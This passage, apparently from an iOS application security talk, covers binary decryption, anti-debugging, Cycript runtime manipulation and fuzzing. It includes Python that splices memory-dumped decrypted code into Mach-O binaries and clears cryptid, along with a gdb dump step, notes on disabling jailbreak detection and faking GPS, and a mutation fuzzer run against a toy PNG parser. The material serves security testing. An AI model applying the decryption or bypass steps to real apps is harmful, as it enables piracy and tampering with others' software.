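    """(cryptoff, cryptsize, cryptid) for the slice at offset, or None if absent."""
    found = _find_encryption_cmd(data, offset)
    if found is None:
        return None
    pos, endian = found
    return struct.unpack(endian + "III", data[pos + 8:pos + 20])

def report(data):
    """Per slice: (arch name, cryptid), i.e. what the otool | grep pipeline shows."""
    out = []
    for cputype, off, _size in slices(data):
        info = encryption_info(data, off)
        out.append((CPU_NAMES.get(cputype, hex(cputype)), None if info is None else info[2]))
    return out

def splice_decrypted(data, offset, dumped_text):
    """Write bytes dumped from the running process over the encrypted range
    of the slice at offset and set cryptid = 0; returns a new bytes object."""
    found = _find_encryption_cmd(data, offset)
    if found is None:
        raise ValueError("slice has no LC_ENCRYPTION_INFO")
    pos, endian = found
    cryptoff, cryptsize, _ = struct.unpack(endian + "III", data[pos + 8:pos + 20])
    if len(dumped_text) != cryptsize:
        raise ValueError("dump must be exactly cryptsize (%d) bytes" % cryptsize)
    out = bytearray(data)
    out[offset + cryptoff:offset + cryptoff + cryptsize] = dumped_text
    out[pos + 16:pos + 20] = struct.pack(endian + "I", 0)    # the cryptid field
    return bytes(out)

def build_slice(is64, cryptid, cputype):
    """Constructed slice: header, one LC_ENCRYPTION_INFO(_64), filler, then
    32 bytes of 0xEE standing in for encrypted __TEXT at cryptoff 64."""
    if is64:
        cmd = struct.pack("<IIIIII", LC_ENCRYPTION_INFO_64, 24, 64, 32, cryptid, 0)
        hdr = struct.pack("<IiiIIIII", MH_MAGIC_64, cputype, 0, 2, 1, len(cmd), 0, 0)
    else:
        cmd = struct.pack("<IIIII", LC_ENCRYPTION_INFO, 20, 64, 32, cryptid)
        hdr = struct.pack("<IiiIIII", MH_MAGIC, cputype, 0, 2, 1, len(cmd), 0)
    blob = hdr + cmd
    return blob + b"\x00" * (64 - len(blob)) + b"\xEE" * 32

def build_fat(parts):
    """Constructed universal binary from (cputype, slice_bytes) pairs; real
    slices are page-aligned, which the parser does not rely on."""
    archs, body, first = b"", b"", 8 + 20 * len(parts)
    for cputype, blob in parts:
        archs += struct.pack(">iiIII", cputype, 0, first + len(body), len(blob), 0)
        body += blob
    return struct.pack(">II", FAT_MAGIC, len(parts)) + archs + body

SAMPLE_FAT = build_fat([
    (CPU_TYPE_ARM, build_slice(False, 1, CPU_TYPE_ARM)),     # still encrypted
    (CPU_TYPE_ARM64, build_slice(True, 0, CPU_TYPE_ARM64)),  # already cleartext
])
```

`report(SAMPLE_FAT)` gives `[('arm', 1), ('arm64', 0)]`: the arm slice still needs the gdb dump from slide 30 before IDA will show anything useful, the arm64 slice can go straight to slide 31. On a real binary `splice_decrypted` takes the bytes you dumped between `cryptoff` and `cryptoff + cryptsize` of the loaded image; the page-aligned layout of real fat files does not change any of the parsing.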
29. Advanced Techniques: iOS Runtime Inspection
   • Anti-Debugging (The Anti-BYOD part)
     o ptrace PT_DENY_ATTACH
     o sysctl check
     o Known files
     o Binary packing
     o Code checksums
     o Driver checks
     o Timing measurements
     o Code obfuscation
     o Junk code

30. Advanced Techniques: iOS Runtime Inspection
   • GDB
     o Execute/load the binary
     o Breakpoint on the start address 0x2000 (PIE may cause this to move on you)
     o Once the loader has decrypted the code, dump it:
       (gdb) dump memory <filename> <start address> <end address>

31. Advanced Techniques: iOS Binary Inspection, Unencrypted
   • IDA Pro binary graphing/analysis…

32. IDA Pro: What to look for?
   • Using the Apple developer reference, find the calls that do:
     o File Writes
     o Network Connections
     o Keychain Access
     o UI Form Fields

33. Advanced Techniques: iOS Runtime Manipulation
   • Cycript - JavaScript/Obj-C interpreter
     o Hook active apps via MobileSubstrate
     o Interact with binaries at runtime using JS
     o http://www.cycript.org/
     o http://iphonedevwiki.net/index.php/Cycript_Tricks

34. Advanced Techniques: iOS Runtime Manipulation
   • Example:
     cy# [SBAwayController.sharedAwayController isPasswordProtected]
     1
     cy# [UIApp.keyWindow recursiveDescription]
     <KHWindow: 0x1517a0; baseClass = UIWindow; frame = (0 0; 320 480); opaque = NO; autoresize = RM+BM; layer = <CALayer: 0x151640>>
        | <UIView: 0x17a120; frame = (0 20; 320 460); autoresize = W+H; layer = <CALayer: 0x17a1b0>>
        |    | <UIToolbar: 0x17a3f0; frame = (0 416; 320 44); autoresize = W+TM; layer = <CALayer: 0x17a0d0>>
        |    |    | <UIToolbarButton: 0x17d150; frame = (12 0; 26 44); alpha = 0.25; opaque = NO; layer = <CALayer: 0x17d2e0>>
        |    |    |    | <UISwappableImageView: 0x17d4c0; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d570>>
        |    |    | <UIToolbarButton: 0x17d340; frame = (153 0; 26 44); opaque = NO; layer = <CALayer: 0x14a220>>
        |    |    |    | <UISwappableImageView: 0x17a680; frame = (0 7; 26 27); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17a6e0>>
        |    |    | <UIToolbarButton: 0x17df40; frame = (222 0; 18 44); opaque = NO; layer = <CALayer: 0x17d2b0>>
        |    |    |    | <UISwappableImageView: 0x17dbf0; frame = (3 13; 18 19); opaque = NO; userInteractionEnabled = NO; layer = <CALayer: 0x17d3f0>>

35. Advanced Techniques: Fuzzing
   • Custom scripts… (Python, Ruby, JavaScript)
   • Dumb or Smart
     o Mutation-based: randomly substitute data.
     o Generation-based: substitute based off an RFC or standard.
   • Classic Targets
     o Any file type (PDF, PPT, etc…)
     o Protocols (HTTP, SMS, Push Notifications, etc...)
     o Image formats (PNG, TIFF, etc…)
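An added example (not code from the deck) of the mutation-based approach from slide 35, in Python as the slide suggests: a seeded, reproducible fuzzer that applies bit flips, boundary integers, span duplication and truncation to a seed file, plus a harness that separates the target's own rejections from uncontrolled failures. The seed is a constructed minimal PNG and the target is a toy chunk parser written for this example; neither the parser nor the mutation strategies come from the deck.

```python
"""Mutation-based ("dumb") fuzzer of the kind slide 35 describes. Each
iteration mutates a seed with one strategy and feeds it to a target; inputs
the target rejects in an uncontrolled way (any exception other than its own
ValueError) are recorded, which is what a crash looks like from a harness.
Added example, not the deck's own code. The seed is a constructed minimal
PNG and the target a toy chunk walker that trusts the length field, standing
in for the image parsers the slide lists."""
import random
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, payload):
    """length + type + data + CRC32(type + data), as the PNG spec lays it out."""
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload) & 0xFFFFFFFF))


# constructed seed: signature, IHDR for a 1x1 8-bit RGB image, IEND
SEED = (PNG_SIG + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
        + png_chunk(b"IEND", b""))


def parse_png_chunks(data):
    """Toy target: returns the chunk types. It validates the signature and
    CRCs (ValueError) but trusts every length field, so a corrupted length
    makes it read past the buffer and die inside struct.unpack."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, types = 8, []
    while pos < len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if crc != zlib.crc32(ctype + body) & 0xFFFFFFFF:
            raise ValueError("bad crc")
        types.append(ctype)
        pos += 12 + length
    return types


def flip_bit(data, rng):
    i = rng.randrange(len(data))
    return data[:i] + bytes([data[i] ^ (1 << rng.randrange(8))]) + data[i + 1:]


def interesting_int(data, rng):
    """Overwrite four bytes with a boundary value: classic length-field abuse."""
    i = rng.randrange(len(data) - 3)
    value = rng.choice([0, 1, 0x7FFFFFFF, 0x80000000, 0xFFFFFFFF])
    return data[:i] + struct.pack(">I", value) + data[i + 4:]


def duplicate_span(data, rng):
    i = rng.randrange(len(data))
    j = rng.randrange(i + 1, len(data) + 1)
    return data[:j] + data[i:j] + data[j:]


def truncate(data, rng):
    return data[:-rng.randrange(1, 8)]


STRATEGIES = [flip_bit, interesting_int, duplicate_span, truncate]


def classify(target, data):
    """'ok', 'rejected' (the parser's own ValueError) or 'crash:<type>: <msg>'."""
    try:
        target(data)
        return "ok"
    except ValueError:
        return "rejected"
    except Exception as exc:
        return "crash:%s: %s" % (type(exc).__name__, exc)


def fuzz(target, seed, iterations=200, rng_seed=1):
    """Run `iterations` mutants through target. Strategies are used round-robin
    so each gets equal coverage; the RNG is seeded so a run is reproducible.
    Returns one record per distinct crash verdict, with the input that caused it."""
    rng = random.Random(rng_seed)
    crashes, seen = [], set()
    for i in range(iterations):
        mutate = STRATEGIES[i % len(STRATEGIES)]
        data = mutate(seed, rng)
        verdict = classify(target, data)
        if verdict.startswith("crash") and verdict not in seen:
            seen.add(verdict)
            crashes.append({"iteration": i, "strategy": mutate.__name__,
                            "verdict": verdict, "input": data})
    return crashes


if __name__ == "__main__":
    for c in fuzz(parse_png_chunks, SEED):
        print(c["iteration"], c["strategy"], c["verdict"], len(c["input"]))
```

A generation-based variant keeps `classify` and `fuzz` and swaps the mutators for a builder that emits chunks from the PNG specification with one field at a time pushed out of range. Against a real target the harness watches the process (exit signal, crash report under the slide-16 paths) instead of catching Python exceptions.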
36. Passive Fuzzing - iOS
   • Using MobileSubstrate:

37. Advanced Techniques: iOS Runtime Manipulation
   • What can we do with this?
     o Application tracing/logging (filesystem, network, etc...)
     o Turn off jailbreak detection
     o Fake GPS data... (think: location-aware security)
     o The possibilities get scarier as trust grows...

38. Trey Keifer
   847-239-5626
   trey.keifer@wireharbor.com
   Twitter: @wireharbor
   Facebook: facebook.com/wireharbor
   http://www.wireharbor.com
   THANK YOU!!!